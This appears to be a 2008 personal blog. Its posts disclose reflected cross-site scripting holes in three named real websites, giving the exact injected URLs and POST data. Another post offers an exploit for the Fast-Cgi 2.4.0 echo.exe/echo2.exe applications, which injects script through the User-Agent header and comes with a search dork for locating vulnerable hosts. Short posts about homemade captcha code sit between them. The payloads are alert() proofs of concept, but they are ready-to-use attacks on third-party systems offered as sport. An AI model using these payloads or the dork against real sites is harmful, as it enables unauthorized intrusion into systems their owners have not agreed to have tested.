Download
Saturday, December 20, 2008
Thursday, December 4, 2008
Friday, September 19, 2008
XSS Party
Site: http://rtp.pt
Site: http://accessola.com
Site: http://wetaworkshop.co.nz/
http://ww1.rtp.pt/homepage/index.php?q_home=%22%3E%3Cscript%3Ealert(%22xss%22)%3B%3C%2Fscript%3E&sa=Pesquisar&pagina_home=&headline=6&visual=3&total_home=&google=0
Site: http://accessola.com
Url : http://www.accessola.com/ola/bins/search.asp
Post data: search_text=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C/script%3E
Site: http://wetaworkshop.co.nz/
Url : http://www.wetaworkshop.co.nz/searchpage
Post data: q=%22%3E%3Cscript%3Ealert%28132%29%3B%3C/script%3E
Monday, September 15, 2008
Yet another captcha
This is another captcha that i made, just for fun. This one, uses the standard captcha method of validation, witch is, the simple retrieve of all chars in the captcha and 'ok'.
Download the code here!
Download the code here!
Sunday, September 14, 2008
Fast-Cgi <=2.4.0 echo.exe/echo2.exe XSS
This is a XSS bug, that i found in fast-cgi 2.4.0 echo/echo2 applications.
This happens because, there isn't a data validation, when the application is printing the data.
Exploit:
Enjoy!
This happens because, there isn't a data validation, when the application is printing the data.
Exploit:
##################################################
Fast-Cgi <=2.4.0 echo.exe/echo2.exe XSS
##################################################
echo.exe : http://[victim]/fcgi-bin/echo.exe
echo2.exe : http://[victim]/fcgi-bin/echo2.exe
Change the User-Agent to:
User-Agent: [XSS]
ex:
User-Agent: <script>alert("XSS");</script>
Dork: inurl:/fcgi-bin/echo
##################################################
by Juza, iamjuza [at] gmail.com
##################################################
Enjoy!
Simple Math Captcha
This is my new captcha, it uses simple math calculus to valid users.
Here's a pic:
Download the code here!
Here's a pic:
Download the code here!
Subscribe to:
Posts (Atom)